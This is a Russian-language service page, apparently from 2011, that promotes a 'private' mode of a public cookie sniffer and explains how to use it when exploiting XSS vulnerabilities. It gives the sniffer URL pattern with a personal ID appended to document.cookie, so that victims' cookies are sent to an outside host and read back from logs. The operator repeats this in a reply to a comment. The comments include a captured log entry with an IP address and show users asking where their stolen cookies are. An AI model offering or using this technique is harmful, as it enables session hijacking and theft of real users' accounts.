С ростом количества пользователей сервиса растут потребности в расширении его функционала. Основная задача: не отходя от концепции общедоступности к принуждению в массовом порядке всех регистрироваться на сайте, сделать private-версию из публичного снифера кукис-файлов.
В русскоязычном сегменте Сети повсеместная распространенность public-сниферов компенсируется практически полным отсутствием их приватных аналогов. «Практически полным» – если не считать сервисы, требующие регистрации.
В результате небольших манипуляций, уже имеющийся Cookies Sniffer превращается в Cookies Sniffer с возможностью индивидуального подхода к пользователю. Без регистрации на сайте. Использовать эту возможность можно с помощью формы, расположенной на странице с сервисом.
Инструкция по эксплуатации
В поле “Code” пользователь вводит свой уникальный идентификатор (пока состоящий максимум из 10 символов), который позволяет из общей «свалки» закрытых логов выбрать записи, принадлежащие именно владельцу кода:
В свою очередь, для того, чтобы записи попали в лог-файл следует изменить адрес снифера на ссылку, содержащую уникальный код:
http://defectech.ru/sniff/snf?idusercodeid
где usercode – Ваш уникальный идентификатор (придумывается Вами).
Таким образом, при эксплуатации XSS-уязвимости ссылка должна иметь примерно следующий вид:
http://defectech.ru/sniff/snf?idusercodeid+document.cookie()…
Далее, для получения принадлежащих Вам логов, необходимо в поле “Code” формы, расположенной на странице сниффера, ввести свой код.
10 comments
Очень благодарен всем создателям сайта!!Активно пользуюсь вашим сервисом!
Плиз объясните, где долгожданные куки……
15:54:11 20.03.2011
Referer:
Query: idbluf1985id
IP: 109.233.236.91
User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.2)
не въезжаю… До этого другим пользовался там все проще было, но он палится( Объясните где они, оч. надо……
ну че не понятно!
Ну дак а как свой идентификатор создать то?
Идентификатор прописывается в ссылке, которая отправляет данные пользователя на снифер. Например: http://defectech.ru/sniff/snf?idblackstappassid+document.cookie(). Таким образом прилетевшие кукисы фиксируются в контейнере логов blackstappass. Далее, для просмотра содержимого данного контейнера в поле “Code” вводится “blackstappass”.
Проблема еще сохранилась?
как привязать скрипт к картинке???
СЕРВИС – ГАВНО!
Они фильтруют все значения с “User=” и показывают только “U”.
Сервис демонстрирует данные в таком виде, в котором они поступили на вход.
Вписую свой id – перекидывет на пустую страницу.